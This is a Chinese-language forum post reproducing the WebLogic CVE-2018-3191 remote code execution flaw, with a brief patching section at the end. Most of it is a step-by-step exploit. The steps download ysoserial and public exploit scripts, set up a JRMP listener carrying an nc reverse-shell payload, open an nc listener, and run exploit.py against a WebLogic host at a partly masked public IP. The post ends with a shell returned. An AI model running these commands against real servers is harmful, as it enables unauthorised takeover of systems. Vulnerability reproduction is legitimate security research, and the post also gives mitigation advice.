標題:Weblogic CVE-2018-3191遠程代碼命令執行漏洞復現

taibeihacker

Moderator

0x00 简介​

北京時間10月17日,Oracle官方發布的10月關鍵補充更新CPU(重要補丁更新)中修復了一個高危的WebLogic遠程代碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。

0x01 漏洞复现​

目標weblogci服務器已開放了T3服務,該服務器是部署在linux下,可以用https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-262進行在docker下部署測試環境。
w3mu4kj400i23382.jpg

1.在JRMPListener主機(公網上的一台主機,ubunut系統,IP地址為:149.28.*.85)上運行以下命令:
wget https://github.com/brianwrf/ysoseri...ri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
如:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 149.28.*.85 5555'
//注意command目前只有nc反彈成功,bash反彈被轉義了,本地監聽1099端口,執行的命令是向weblogic服務器發送nc反彈命令的poc。
ed3znhzsmcv23383.jpg

2.同時在JRMPListener主機另開一個命令窗口進行監聽nc端口,命令如下:
nc -lvvp 5555
wez30axxfff23384.jpg

3.在本地的windows系統攻擊者主機上運行此腳本:
weblogic-spring-jndi-12.2.1.3.jar 對於weblogic:
12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar 對於weblogic:
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1
wget https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-10.3.6.0.jar
wget https://github.com/pyn3rd/CVE-2018-3191/blob/master/weblogic-spring-jndi-12.2.1.3.jar
wget https://raw.githubusercontent.com/Libraggbond/CVE-2018-3191/master/exploit.py
python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
python exploit.py 66.42.*.195 7001 weblogic-spring-jndi-10.3.6.0.jar 149.28.146.85 1099 //這裡的66.42.*.195是weblogc服務器,7001為weblogic服務器端口;149.28.*.85為JRMPListener主機,主機的監聽端口為1099
uqb14beq4kd23385.jpg

最終可以看到反彈的shell:
4rbrj0muqsf23386.jpg

0x02 漏洞修复​

1.Oracle官方已經在10月關鍵補丁更新CPU(重要補丁更新)中修復了該漏洞,強烈建議受影響的用戶盡快升級更新進行防護。
2.禁止T3協議

0x03 参考链接​

 
返回
上方